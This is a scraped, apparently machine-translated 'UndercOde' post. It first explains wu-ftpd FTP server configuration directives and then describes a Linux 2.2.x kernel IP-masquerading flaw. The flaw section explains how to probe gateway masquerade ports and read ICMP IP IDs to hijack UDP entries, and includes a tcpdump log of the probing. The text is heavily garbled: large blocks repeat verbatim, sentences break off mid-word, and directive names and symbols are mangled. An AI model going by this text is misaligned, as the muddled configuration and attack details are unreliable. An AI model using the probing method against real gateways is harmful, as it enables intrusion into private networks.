Allow guest account users to use only 5 minutes
limit--Restricts how many people can go online at the same time, the usage is as follows:
limit <number of connections> <time zone> <full information file>
Set up a few people can go online at the same time in a certain time zone , Followed by information to be displayed when the number of connections is exceeded. For example:
limit all 32 Any /home/ftp/etc/toomanyuser.msg
limits all connections to only 32 users at any time. If it exceeds, it will refuse to connect and display the message
limit levellone 5 Any2300-0600 / home / ftp / etc /toomanyuser.msg
restricts the levellone user to 5
noretrieve connections during the period from 23:00 to 6:00- setting which files are not downloadable
noretrieve [absolute / relative] [class =] ... [[ -] [<File name> ...]
absolute or relative refers to whether the file uses absolute or relative paths
allow = retrieve--set which files can be downloaded
allow [absolute / relative] [class =]β¦ [-] [<file name > ...]
loginfails-- set number of incorrect login attempts can be
when a user connection may have the wrong ID or password, this setting can let him wrong on several times after the break, prevent people from guessing passwords with brute-force method.
private--Sets whether SITE GROUP / SITE GPASS can be executed online
When opening the SITE GROUP and SITE GPASS commands, you can use these two commands to switch to the / etc / ftpgroup group. Generally, we will not use this feature to avoid security holes.
greeting--Displays the server's version information, usage is as follows:
greeting
> nextpart
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦π¦ Set up FTP server with wu-ftpd : FULL BY UNDERCODE
fb.com/UndercodeTestingCompany
π¦ P A R T 2
When you define those that belong to the same A user of a class will be mapped to a corresponding group once connected, so you can use Unix file permissions to restrict a group of people. deny--Rejects connections
to certain addresses, the usage is as follows:
deny <address to refuse connections> <information file>
prohibits some machines from connecting, and displays <information file>. For example:
deny 210.62.146. *: 255.255.255.254 /etc/reject.msg
guestgroup--set guest group
guestuser--set guest account
realgroup--set real group
realuser--set real account
nice-- Set how much priority is given to certain classes, the usage is as follows:
nice
In Linux, the value of nice is -20 (highest priority) to 19 (last processing). Here you can specify a negative value to increase the priority of a certain class.
defumask--Set the umask of a class, the usage is as follows:
defumask []
umask is the permission mask of the file when the file is created
tcpwindow--Set the size of tcpwindow
keepalive--Set whether to use TCP SO_KEEPALIVE to control the disconnection
timeout--Set the connection timeout, the usage is as follows:
timeout accept <second> timeout connect
, the default
timeout connect <second>
connection establishment timeout, Preset 120 seconds
timeout data <second>
data transmission timeout, preset 1200 seconds
timeout idle <second>
user daze timeout, preset 900 seconds
file-limit--Limit a class to only a few files, the usage is as follows:
file- limit [] []
limits the number of access files for a certain class, including in (upload), out (download), total raw represents the result of the entire transfer, not just data files. For example:
file-limit out 20 lvfour
limit users of the lvfour class can only download a maximum of 20 files
byte-limit-limit a class to only a few bytes, usage is similar to file-limit
limit-time-limit one How long can the connection last, the usage is as follows:
limit-time {* | anonymous | guest} <minute>
In order to prevent someone from hanging on the station, you can use this method to limit the user's online time, for example:
limit-time guest 5
Allow guest account users to use only 5 minutes
limit--Restricts how many people can go online at the same time, the usage is as follows:
limit <number of connections> <time zone> <full information file>
Set up a few people can go online at the same time in a certain time zone , Followed by information to be displayed when the number of connections is exceeded. For example:
limit all 32 Any /home/ftp/etc/toomanyuser.msg
limits all connections to only 32 users at any time. If it exceeds, it will refuse to connect and display the message
limit levellone 5 Any2300-0600 / home / ftp / etc /toomanyuser.msg
restricts the levellone user to 5
noretrieve connections during the period from 23:00 to 6:00- setting which files are not downloadable
noretrieve [absolute / relative] [class =] ... [[ -] [<File name> ...]
absolute or relative refers to whether the file uses absolute or relative paths
allow = retrieve--set which files can be downloaded
allow [absolute / relative] [class =]β¦ [-] [<file name > ...]
loginfails-- set number of incorrect login attempts can be
when a user connection may have the wrong ID or password, this setting can let him wrong on several times after the break, prevent people from guessing passwords with brute-force method.
private--Sets whether SITE GROUP / SITE GPASS can be executed online
When opening the SITE GROUP and SITE GPASS commands, you can use these two commands to switch to the / etc / ftpgroup group. Generally, we will not use this feature to avoid security holes.
greeting--Displays the server's version information, usage is as follows:
greeting
> nextpart
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
UndercOde Testing Company
UndercOde Testing Company. 94 likes Β· 6 talking about this. Local service
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PART 3
> FOR Set up FTP server with wu-ftpd : FULL BY UNDERCODE
fb.com/UndercodeTestingCompany
usage is as follows:
greeting
server information displayed when the user logs in, full is the default value, including the version number and hostname, brief only hostname, and terse only "FTP server ready" information.
barnner--Sets the information that the user sees before entering the Login screen. The usage is as follows:
banner <file path>
This describes the information that will appear before the user logs in before ID / Password is entered. The file path refers to the real path, not the root directory of ftp.
host--Set the FTP host name
email--Specify the email address of the ftp manager
message--The setting of the message file, the usage is as follows:
message <file> {<when> {β¦β¦}}
The path of the file here is Compared to the root directory of ftp, "when" refers to the reaction after you do something. There are several options:
login (when logging in)
cwd = <directory> (when entering a directory) The
class name is already Defined, who is allowed to send your message only.
In addition to the text, the content of the information file can also use the following predefined codes:
% T (local time)
% F (space remaining in the current partition)
% C (current directory)
% E (Manager's E-mail)
% R (Client host name)
% L (Local host name)
% U (User name)
% M (How many people are allowed to connect to the same class as me)
% N (With How many people in my class are currently connected)
% B (Absolute disk limit size, current partition (unit blocks))
% b (Preferred disk limit size, current partition (unit blocks))
% Q (Currently used blocks)
% I (maximum available inodes (+1))
% i (Preferred inodes limit)
% q (currently used indoes)
% H (time limit for excessive use of disk space)
% h (time for excessive use of the number of files Restrictions)
readme--Notify the user of which README files have been updated.log
commands--Record the commands used by the user, as follows:
log commands <user type>
log transfers--Record the files transferred by the user, as follows:
log transfers < User Type> <Transfer Direction>
Sets what types of user transfer files need to be recorded, including inbound (user upload) and outbound (user download), for example:
log transfers anonymous, guest inbound, outbound
log security--record security The usage is as follows:
log security <subscriber category>
particularly relevant for recording user regarding certain safety record noretrive, notar other
log syslog-- to syslog file system
alias-- set directory alias is used as follows:
Alias <alias string> <Directory>
cdpath--Set cd to change directory search order
compress, tar--Set whether to compress automatically, usage is as follows:
compress [β¦β¦]
tar [β¦β¦]
defines who can perform compression and tar
shutdown--notifies the user Shut down the
shutdown <information file>
If the information file exists, after a certain time specified by this file, the connection will be rejected and the existing connection will be cut off, and the system will be shut down as soon as it arrives. The format of this information file is as follows:
<year> <month> <day> <hour> <minute> <countdown to rejection> <countdown to disconnection> <text>
daemon address--Specifies that you only listen to a certain IP address, the usage is as follows:
daemon address
When you have many IPs, using this option will cancel any other virtual FTP host settings. If not set, all IPs will be monitored.
virtual--Set virtual FTP site
wu-ftpd provides the function of virtual host, that is, different FTP sites are provided on the same machine, distinguished by host name or IP; of course, if you want to use the name, you also need Cooperate with DNS. There are many settings for
virtual : virtual
<path>
π¦PART 3
> FOR Set up FTP server with wu-ftpd : FULL BY UNDERCODE
fb.com/UndercodeTestingCompany
usage is as follows:
greeting
server information displayed when the user logs in, full is the default value, including the version number and hostname, brief only hostname, and terse only "FTP server ready" information.
barnner--Sets the information that the user sees before entering the Login screen. The usage is as follows:
banner <file path>
This describes the information that will appear before the user logs in before ID / Password is entered. The file path refers to the real path, not the root directory of ftp.
host--Set the FTP host name
email--Specify the email address of the ftp manager
message--The setting of the message file, the usage is as follows:
message <file> {<when> {β¦β¦}}
The path of the file here is Compared to the root directory of ftp, "when" refers to the reaction after you do something. There are several options:
login (when logging in)
cwd = <directory> (when entering a directory) The
class name is already Defined, who is allowed to send your message only.
In addition to the text, the content of the information file can also use the following predefined codes:
% T (local time)
% F (space remaining in the current partition)
% C (current directory)
% E (Manager's E-mail)
% R (Client host name)
% L (Local host name)
% U (User name)
% M (How many people are allowed to connect to the same class as me)
% N (With How many people in my class are currently connected)
% B (Absolute disk limit size, current partition (unit blocks))
% b (Preferred disk limit size, current partition (unit blocks))
% Q (Currently used blocks)
% I (maximum available inodes (+1))
% i (Preferred inodes limit)
% q (currently used indoes)
% H (time limit for excessive use of disk space)
% h (time for excessive use of the number of files Restrictions)
readme--Notify the user of which README files have been updated.log
commands--Record the commands used by the user, as follows:
log commands <user type>
log transfers--Record the files transferred by the user, as follows:
log transfers < User Type> <Transfer Direction>
Sets what types of user transfer files need to be recorded, including inbound (user upload) and outbound (user download), for example:
log transfers anonymous, guest inbound, outbound
log security--record security The usage is as follows:
log security <subscriber category>
particularly relevant for recording user regarding certain safety record noretrive, notar other
log syslog-- to syslog file system
alias-- set directory alias is used as follows:
Alias <alias string> <Directory>
cdpath--Set cd to change directory search order
compress, tar--Set whether to compress automatically, usage is as follows:
compress [β¦β¦]
tar [β¦β¦]
defines who can perform compression and tar
shutdown--notifies the user Shut down the
shutdown <information file>
If the information file exists, after a certain time specified by this file, the connection will be rejected and the existing connection will be cut off, and the system will be shut down as soon as it arrives. The format of this information file is as follows:
<year> <month> <day> <hour> <minute> <countdown to rejection> <countdown to disconnection> <text>
daemon address--Specifies that you only listen to a certain IP address, the usage is as follows:
daemon address
When you have many IPs, using this option will cancel any other virtual FTP host settings. If not set, all IPs will be monitored.
virtual--Set virtual FTP site
wu-ftpd provides the function of virtual host, that is, different FTP sites are provided on the same machine, distinguished by host name or IP; of course, if you want to use the name, you also need Cooperate with DNS. There are many settings for
virtual : virtual
<path>
Facebook
UndercOde Testing Company
UndercOde Testing Company. 94 likes Β· 6 talking about this. Local service
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PART 4
> FOR Set up FTP server with wu-ftpd : FULL BY UNDERCODE
fb.com/UndercodeTestingCompany
Can be a host name or IP address of the
root refers to the root directory of the ftp, banner is a welcome message, logfile refers to the log file of the virtual platform
The following are some examples:
Virtual virtual.com.bj root / Home / ftp2
Virtual Virtual. com.bj banner /etc/vftpbanner.2
virtual virtual.com.bj logfile /etc/viftplog.2
virtual
<letter> The
user can find the hostname and the administrator email. Here are some examples:
virtual 210.62.146.50 hostname virtual.site .com.bj
virtual vritual.site.com.bj email ftpown@virtual.site.com.bj
virtual
allow <user> [<user> ...]
virtual
deny <user> [<user> ...]
Obviously, the above the two options are to set whether to allow the connection, the following are some examples:
virtual virtual.site.com.bj the allow *
virtual virtual.site.com.bj deny badman
virtual
Private
this virtual platform reject anonymous users
defaultserver deny <user> [<user> ...]
defaultserver allow <user> [<user> ...]
When we use a virtual host, the original deny and allow settings do not know which server to set, so it will be invalid. Use defaultserver represents the original host
defaultserver private
master station rejects anonymous users
passive address--translated IP value
passive address <external IP> / cidr
passive ports--passive ports range
passive ports
pasv-allow--allows the use of pasv
pasv-allow [ <Address> ...]
port-allow
--allow port port-allow [<address> ...]
mailserver--specify the mail server
for upload notification
incmail--specify the email notification address for anonymous upload virtual incmail--specify the virtual host anonymous upload email notification address
defaultserver incmail--specified default email notification address for anonymous upload
mailfrom--notified sender upload
virtual mailfrom--virtual host upload notification sender
defaultserver mailfrom--the sender of the default host upload notification
chmod--set whether the file permissions can be changed
delete--set whether the file can be deleted
overwrite--overwrite the file
rename--rename the file
umask--allow umask
passwd -check--Set the password check level of anonymous FTP, the usage is as follows:
passwd-check ()
sets whether to check the password of anonymous FTP users, none means not check, trivial is any password containing @, rfc822 means the password is required Following the RFC822 format, enforce indicates that the password check is not allowed, and warn indicates that the password check is only a warning message.
deny = email--Reject specific emails as password
path-filer--Determine which file names are not available
path-filer <error message file> <allowed characters> <not allowed characters>
upload--Set upload permissions
upload [absloute /relative][class=]...[-]<set directory>> [dirs / nodirs] [d_mode] is
used to set permissions on the directory we want to set:
absoulte / relative uses absolute or relative paths
class = Specify a class
root-dir to which root-dir people, which is the login directory after chroot, apply this rule
The set directory refers to the directory we want to restrict.
Yes / no indicates whether it is possible to open a new file
owner in this directory , group indicates the opened file owner and group
Mode refers to the file permissions
dirs / nodirs Refers to whether it is possible to open a new directory.
D_mode sets the permissions of the directory when creating a new directory. If it is not set, it will be set according to mode--
control the download speed
thoughput <subdirectory list> <file> <remote address list>
For the remote address, control the speed when he grabs some files in a subdirectory, for example:
thoughput / e / ftp * *
oo- * thoughput / e / ftp / sw * * 1024 0.5 *
thoughput / e / ftp sw * readme
oo- * thoughput / e / ftp sw * * oo-* .foo.com
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PART 4
> FOR Set up FTP server with wu-ftpd : FULL BY UNDERCODE
fb.com/UndercodeTestingCompany
Can be a host name or IP address of the
root refers to the root directory of the ftp, banner is a welcome message, logfile refers to the log file of the virtual platform
The following are some examples:
Virtual virtual.com.bj root / Home / ftp2
Virtual Virtual. com.bj banner /etc/vftpbanner.2
virtual virtual.com.bj logfile /etc/viftplog.2
virtual
<letter> The
user can find the hostname and the administrator email. Here are some examples:
virtual 210.62.146.50 hostname virtual.site .com.bj
virtual vritual.site.com.bj email ftpown@virtual.site.com.bj
virtual
allow <user> [<user> ...]
virtual
deny <user> [<user> ...]
Obviously, the above the two options are to set whether to allow the connection, the following are some examples:
virtual virtual.site.com.bj the allow *
virtual virtual.site.com.bj deny badman
virtual
Private
this virtual platform reject anonymous users
defaultserver deny <user> [<user> ...]
defaultserver allow <user> [<user> ...]
When we use a virtual host, the original deny and allow settings do not know which server to set, so it will be invalid. Use defaultserver represents the original host
defaultserver private
master station rejects anonymous users
passive address--translated IP value
passive address <external IP> / cidr
passive ports--passive ports range
passive ports
pasv-allow--allows the use of pasv
pasv-allow [ <Address> ...]
port-allow
--allow port port-allow [<address> ...]
mailserver--specify the mail server
for upload notification
incmail--specify the email notification address for anonymous upload virtual incmail--specify the virtual host anonymous upload email notification address
defaultserver incmail--specified default email notification address for anonymous upload
mailfrom--notified sender upload
virtual mailfrom--virtual host upload notification sender
defaultserver mailfrom--the sender of the default host upload notification
chmod--set whether the file permissions can be changed
delete--set whether the file can be deleted
overwrite--overwrite the file
rename--rename the file
umask--allow umask
passwd -check--Set the password check level of anonymous FTP, the usage is as follows:
passwd-check ()
sets whether to check the password of anonymous FTP users, none means not check, trivial is any password containing @, rfc822 means the password is required Following the RFC822 format, enforce indicates that the password check is not allowed, and warn indicates that the password check is only a warning message.
deny = email--Reject specific emails as password
path-filer--Determine which file names are not available
path-filer <error message file> <allowed characters> <not allowed characters>
upload--Set upload permissions
upload [absloute /relative][class=]...[-]<set directory>> [dirs / nodirs] [d_mode] is
used to set permissions on the directory we want to set:
absoulte / relative uses absolute or relative paths
class = Specify a class
root-dir to which root-dir people, which is the login directory after chroot, apply this rule
The set directory refers to the directory we want to restrict.
Yes / no indicates whether it is possible to open a new file
owner in this directory , group indicates the opened file owner and group
Mode refers to the file permissions
dirs / nodirs Refers to whether it is possible to open a new directory.
D_mode sets the permissions of the directory when creating a new directory. If it is not set, it will be set according to mode--
control the download speed
thoughput <subdirectory list> <file> <remote address list>
For the remote address, control the speed when he grabs some files in a subdirectory, for example:
thoughput / e / ftp * *
oo- * thoughput / e / ftp / sw * * 1024 0.5 *
thoughput / e / ftp sw * readme
oo- * thoughput / e / ftp sw * * oo-* .foo.com
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
UndercOde Testing Company
UndercOde Testing Company. 94 likes Β· 6 talking about this. Local service
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PART 5
> FOR Set up FTP server with wu-ftpd : FULL BY UNDERCODE
fb.com/UndercodeTestingCompany
Can you see the above settings? "Oo" means unlimited bytes / sec, "-" or "1.0" means double. The first line means that the files under / e / ftp do not limit the download speed; the second line says that any files under / sw * are limited to 1024bytes / sec *
0.5 = 512bytes / sec; the third line The speed limit of the readme file is cancelled again; the last line is open to full speed for * .foo.com.
anonymous-root--Sets the anonymous user's root directory for a class
anonymous-root []
guest-root--Presets a guest user's root directory
guest-root []
where used to specify the uid range
deny-uid, deny-gid--reject a certain range of UID (GID) range
allow-uid, allow-gid--allow a certain range of UID (GID) range
restricted-uid, restricted-gid--restricted user cannot leave his login directory
unrestricted-uid, unrestricted-gid--user can leave his login directory
dns refuse_mismatch--set the action that
DNS finds that the name does not match the user setting dns refuse_mismatch <message File> [override]
When the user uses an unregistered IP, he refuses his connection. Override ignores the error and lets him connect. The information file is for the user.
dns refuse_no_reverse--Sets the connection to be rejected without anti-checking records.
dns refuse_no_reverse <information file> [override]
When the user's IP check is not checked, the connection is rejected.
dns resolveoptions--Set DNS resolution options
dns resolveoptions [options ]
DNS resolution options can be set here.
/ Etc / ftphosts The
ftphosts file is actually similar to the access in ftpaccess, which is very similar to deny. It is used to set up certain ID connections. It has no class definition, so it must be a real user .
allow | deny <user> <address> [<address>
Here are some examples:
allow rose 140.0.0 / 8
deny jack 140.123.0.0:255.255.0.0
allow rose to come in from 140. *. *. *, Deny jack to come up from 140.123. *. *
β / etc / ftpservers
this file control When you have different IP / hostname, which configuration file to use for incoming connections. For example:
10.196.145.10 /etc/ftpd/ftpaccess.somedomain/
10.196.145.200 /etc/ftpd/ftpaccess.someotherdomain/
some.domain internal
10.196.145.20 /etc/ftpd/config/faqs.org/
ftp.some.domain / etc / ftpd / config / faqs.org /
β / etc / ftpusers
The users recorded in this file are prohibited from using FTP
β / etc / ftpgroups
for the SITE GROUP command, and switch groups online. SITE EXEC is prone to security vulnerabilities, and we are generally not open.
Etc / etc / ftpconversions is
used to configure the configuration files of tar, compress, gzip and other action instructions. Just use the presets. If you do not enable instant compression and packaging, you can also clear the content.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PART 5
> FOR Set up FTP server with wu-ftpd : FULL BY UNDERCODE
fb.com/UndercodeTestingCompany
Can you see the above settings? "Oo" means unlimited bytes / sec, "-" or "1.0" means double. The first line means that the files under / e / ftp do not limit the download speed; the second line says that any files under / sw * are limited to 1024bytes / sec *
0.5 = 512bytes / sec; the third line The speed limit of the readme file is cancelled again; the last line is open to full speed for * .foo.com.
anonymous-root--Sets the anonymous user's root directory for a class
anonymous-root []
guest-root--Presets a guest user's root directory
guest-root []
where used to specify the uid range
deny-uid, deny-gid--reject a certain range of UID (GID) range
allow-uid, allow-gid--allow a certain range of UID (GID) range
restricted-uid, restricted-gid--restricted user cannot leave his login directory
unrestricted-uid, unrestricted-gid--user can leave his login directory
dns refuse_mismatch--set the action that
DNS finds that the name does not match the user setting dns refuse_mismatch <message File> [override]
When the user uses an unregistered IP, he refuses his connection. Override ignores the error and lets him connect. The information file is for the user.
dns refuse_no_reverse--Sets the connection to be rejected without anti-checking records.
dns refuse_no_reverse <information file> [override]
When the user's IP check is not checked, the connection is rejected.
dns resolveoptions--Set DNS resolution options
dns resolveoptions [options ]
DNS resolution options can be set here.
/ Etc / ftphosts The
ftphosts file is actually similar to the access in ftpaccess, which is very similar to deny. It is used to set up certain ID connections. It has no class definition, so it must be a real user .
allow | deny <user> <address> [<address>
Here are some examples:
allow rose 140.0.0 / 8
deny jack 140.123.0.0:255.255.0.0
allow rose to come in from 140. *. *. *, Deny jack to come up from 140.123. *. *
β / etc / ftpservers
this file control When you have different IP / hostname, which configuration file to use for incoming connections. For example:
10.196.145.10 /etc/ftpd/ftpaccess.somedomain/
10.196.145.200 /etc/ftpd/ftpaccess.someotherdomain/
some.domain internal
10.196.145.20 /etc/ftpd/config/faqs.org/
ftp.some.domain / etc / ftpd / config / faqs.org /
β / etc / ftpusers
The users recorded in this file are prohibited from using FTP
β / etc / ftpgroups
for the SITE GROUP command, and switch groups online. SITE EXEC is prone to security vulnerabilities, and we are generally not open.
Etc / etc / ftpconversions is
used to configure the configuration files of tar, compress, gzip and other action instructions. Just use the presets. If you do not enable instant compression and packaging, you can also clear the content.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
UndercOde Testing Company
UndercOde Testing Company. 94 likes Β· 6 talking about this. Local service
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
DON T CLONE UNDERCODE TUTORIALS WITHOUT PERMISSION
β πΏ
DON T CLONE UNDERCODE TUTORIALS WITHOUT PERMISSION
β πΏ
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Kernel IP Masquerading Has Security Vulnerability :
> T.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) There are serious security vulnerabilities in the IP masquerading implementation of the Linux system 2.2.x kernel. Lack of careful checking of the connection in the relevant core code. An attacker can rewrite the UDP masquerading entries in the kernel so that theKernel IP Masquerading Has Security Vulnerability
There are serious security vulnerabilities in the IP masquerading implementation of the Linux system 2.2.x kernel. Lack of careful checking of the connection in the relevant core code. An attacker can rewrite the UDP masquerading entries in the kernel so that the attacker's UDP packets can be routed to the internal machine.
2) When an internal IP wants to access the DNS server of the external network, when the UDP packet sent passes through the IP masquerading gateway, the kernel will add an entry to record the connection. For example, a UDP packet connected from internal host A's 1035 port to external host C's 53 port. The kernel replaces the source address of this packet with the IP of the masquerading gateway (B), and the source port is set to the one assigned on the gateway for this connection. Port, the default is from port 61000 to port 65096, so theoretically the core can handle 4096 TCP / UDP masquerading connections simultaneously.
Host A: 1035-> GW B: 63767-> Host C: 53
3) When an external network sends a UDP packet to the masquerading gateway, Linux IP masquerading only determines whether the UDP packet should be forwarded to the internal network based on the destination port. If the destination port has a corresponding entry in the
> will send more vulnerabilities & bugs on @UndercOdeTesting
established masquerade connection table, it will update the source IP and source port in this packet with the remote host IP and port of the corresponding entry. As long as the attacker determines the port of the masquerading gateway, he may use his own IP and port to rewrite the masquerading connection table. The range of ports used by masquerading gateways to service masquerading connections is usually from 61000 to 65096, so external attackers can easily determine which ports have been used to establish a connection. An attacker can send UDP detection packets to these ports spoofing the gateway, and then check the IP ID of the ICMP response packet of the port. Each host sends a packet, and the IP ID in its TCP / IP stack is incremented by one. Therefore, the ICMP response sent by the port used for ip masquerading will have the IP ID of the internal host.
4) This ID is usually much different from the current IP ID of the gateway host, usually more than 1000. The following example shows the process of using the vulnerability to attack:
Host A is the internal host (192.168.1.100) and
Host B is the masquerading gateway (192.168.1.1 / 10.0.0.1)
Host C is an external DNS server (10.0.0.25)
Host X is an external attacker's IP (10.10.187.13)
5) Before detection, execute the command on the masquerading gateway: ipchains -L -M -n to display the current masquerade connection table The situation:
> UDP 03: 39.21 192.168.1.100 10.0.0.25 1035 (63767)-> 53
is currently a connection sent from port 1035 of 192.168.1.100 to port 53 of 10.0.0.25, and the masquerade port is 63767
[from the attacker Results from tcpdump on the machine]
(To make it easier to see the problem, here we set the source port of all packets used for detection to 12345)
[Our detection will start from port 61000, we have omitted some of the previous results]
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos 0xd8] (ttl 245, id 13135)
10.10.187.13.12345> 10.0.0.1.63763: udp 0 (DF) [tos 0x18] (tos 0x18) ( ttl 254, id 23069)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos 0xd8] (ttl 245, id 13136)
10.10.187.13.12345> 10.0.0.1.63764: udp 0 (DF ) [tos 0x18] (ttl 254, id 23070)
π¦ Kernel IP Masquerading Has Security Vulnerability :
> T.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) There are serious security vulnerabilities in the IP masquerading implementation of the Linux system 2.2.x kernel. Lack of careful checking of the connection in the relevant core code. An attacker can rewrite the UDP masquerading entries in the kernel so that theKernel IP Masquerading Has Security Vulnerability
There are serious security vulnerabilities in the IP masquerading implementation of the Linux system 2.2.x kernel. Lack of careful checking of the connection in the relevant core code. An attacker can rewrite the UDP masquerading entries in the kernel so that the attacker's UDP packets can be routed to the internal machine.
2) When an internal IP wants to access the DNS server of the external network, when the UDP packet sent passes through the IP masquerading gateway, the kernel will add an entry to record the connection. For example, a UDP packet connected from internal host A's 1035 port to external host C's 53 port. The kernel replaces the source address of this packet with the IP of the masquerading gateway (B), and the source port is set to the one assigned on the gateway for this connection. Port, the default is from port 61000 to port 65096, so theoretically the core can handle 4096 TCP / UDP masquerading connections simultaneously.
Host A: 1035-> GW B: 63767-> Host C: 53
3) When an external network sends a UDP packet to the masquerading gateway, Linux IP masquerading only determines whether the UDP packet should be forwarded to the internal network based on the destination port. If the destination port has a corresponding entry in the
> will send more vulnerabilities & bugs on @UndercOdeTesting
established masquerade connection table, it will update the source IP and source port in this packet with the remote host IP and port of the corresponding entry. As long as the attacker determines the port of the masquerading gateway, he may use his own IP and port to rewrite the masquerading connection table. The range of ports used by masquerading gateways to service masquerading connections is usually from 61000 to 65096, so external attackers can easily determine which ports have been used to establish a connection. An attacker can send UDP detection packets to these ports spoofing the gateway, and then check the IP ID of the ICMP response packet of the port. Each host sends a packet, and the IP ID in its TCP / IP stack is incremented by one. Therefore, the ICMP response sent by the port used for ip masquerading will have the IP ID of the internal host.
4) This ID is usually much different from the current IP ID of the gateway host, usually more than 1000. The following example shows the process of using the vulnerability to attack:
Host A is the internal host (192.168.1.100) and
Host B is the masquerading gateway (192.168.1.1 / 10.0.0.1)
Host C is an external DNS server (10.0.0.25)
Host X is an external attacker's IP (10.10.187.13)
5) Before detection, execute the command on the masquerading gateway: ipchains -L -M -n to display the current masquerade connection table The situation:
> UDP 03: 39.21 192.168.1.100 10.0.0.25 1035 (63767)-> 53
is currently a connection sent from port 1035 of 192.168.1.100 to port 53 of 10.0.0.25, and the masquerade port is 63767
[from the attacker Results from tcpdump on the machine]
(To make it easier to see the problem, here we set the source port of all packets used for detection to 12345)
[Our detection will start from port 61000, we have omitted some of the previous results]
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos 0xd8] (ttl 245, id 13135)
10.10.187.13.12345> 10.0.0.1.63763: udp 0 (DF) [tos 0x18] (tos 0x18) ( ttl 254, id 23069)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos 0xd8] (ttl 245, id 13136)
10.10.187.13.12345> 10.0.0.1.63764: udp 0 (DF ) [tos 0x18] (ttl 254, id 23070)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos 0xd8] (ttl 245, id 13137)
10.10.187.13.12345> 10.0.0.1.63765: udp 0 (DF) [tos 0x18] (tos 0x18) ( ttl 254, id 23071)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos 0xd8] (ttl 245, id 13138)
10.10.187.13.12345> 10.0.0.1.63766: udp 0 (DF ) [tos 0x18] (ttl 254, id 23074)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos 0xd8] (ttl 245, id 13139)
10.10.187.13.12345> 10.0.0.1. 63 767: 0 UDP (the DF) [TOS 0x18] (TTL 254, ID 23083)
10.0.0.1> 10.10.187.13: ICMP: 10.0.0.1 unreachable The UDP Port 63767 [TOS 0xD8] (TTL 244, ID 17205)
attacker's UDP packets can be routed to the internal machine.
6) When an internal IP wants to access the DNS server of the external network, when the UDP packet sent passes through the IP masquerading gateway, the kernel will add an entry to record the connection. For example, a UDP packet connected from internal host A's 1035 port to external host C's 53 port. The kernel replaces the source address of this packet with the IP of the masquerading gateway (B), and the source port is set to the one assigned on the gateway for this connection. Port, the default is from port 61000 to port 65096, so theoretically the core can handle 4096 TCP / UDP masquerading connections simultaneously.
Host A: 1035-> GW B: 63767-> Host C: 53
7) When an external network sends a UDP packet to the masquerading gateway, Linux IP masquerading only determines whether the UDP packet should be forwarded to the internal network based on the destination port. If the destination port has a corresponding entry in the established masquerade connection table, it will update the source IP and source port in this packet with the remote host IP and port of the corresponding entry. As long as the attacker determines the port of the masquerading gateway, he may use his own IP and port to rewrite the masquerading connection table. The range of ports used by masquerading gateways to service masquerading connections is usually from 61000 to 65096, so external attackers can easily determine which ports have been used to establish a connection. An attacker can send UDP detection packets to these ports spoofing the gateway, and then check the IP ID of the ICMP response packet of the port. Each host sends a packet, and the IP ID in its TCP / IP stack is incremented by one. Therefore, the ICMP response sent by the port used for ip masquerading will have the IP ID of the internal host.
This ID is usually much different from the current IP ID of the gateway host, usually more than 1000. The following example shows the process of using the vulnerability to attack:
Host A is the internal host (192.168.1.100) and
Host B is the masquerading gateway (192.168.1.1 / 10.0.0.1)
Host C is an external DNS server (10.0.0.25)
Host X is an external attacker's IP (10.10.187.13)
Before detection, execute the command on the masquerading gateway: ipchains -L -M -n to display the current masquerade connection table The situation:
> UDP 03: 39.21 192.168.1.100 10.0.0.25 1035 (63767)-> 53
is currently a connection sent from port 1035 of 192.168.1.100 to port 53 of 10.0.0.25, and the masquerade port is 63767
[from the attacker Results from tcpdump on the machine]
(To make it easier to see the problem, here we set the source port of all packets used for detection to 12345)
[Our detection will start from port 61000, we have omitted some of the previous results]
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos 0xd8] (ttl 245, id 13135)
10.10.187.13.12345> 10.0.0.1.63763: udp 0 (DF) [tos 0x18] (tos 0x18) ( ttl 254, id 23069)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos 0xd8] (ttl 245, id 13136)
10.10.187.13.12345> 10.0.0.1.63764: udp 0 (DF ) [tos 0x18] (ttl 254, id 23070)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos 0xd8] (ttl 245, id 13137)
10.10.187.13.12345> 10.0.0.1.63765: udp 0 (DF) [tos 0x18] (tos 0x18) ( ttl 254, id 23071)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos 0xd8] (ttl 245, id 13138)
10.10.187.13.12345> 10.0.0.1.63766: udp 0 (DF ) [tos 0x18] (ttl 254, id 23074)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos 0xd8] (ttl 245, id 13139)
10.10.187.13.12345> 10.0.0.1. 63 767: 0 UDP (the DF) [TOS 0x18] (TTL 254, ID 23083)
10.0.0.1> 10.10.187.13: ICMP: 10.0.0.1 unreachable The UDP Port 63767 [TOS 0xD8] (TTL 244, ID 17205)
attacker's UDP packets can be routed to the internal machine.
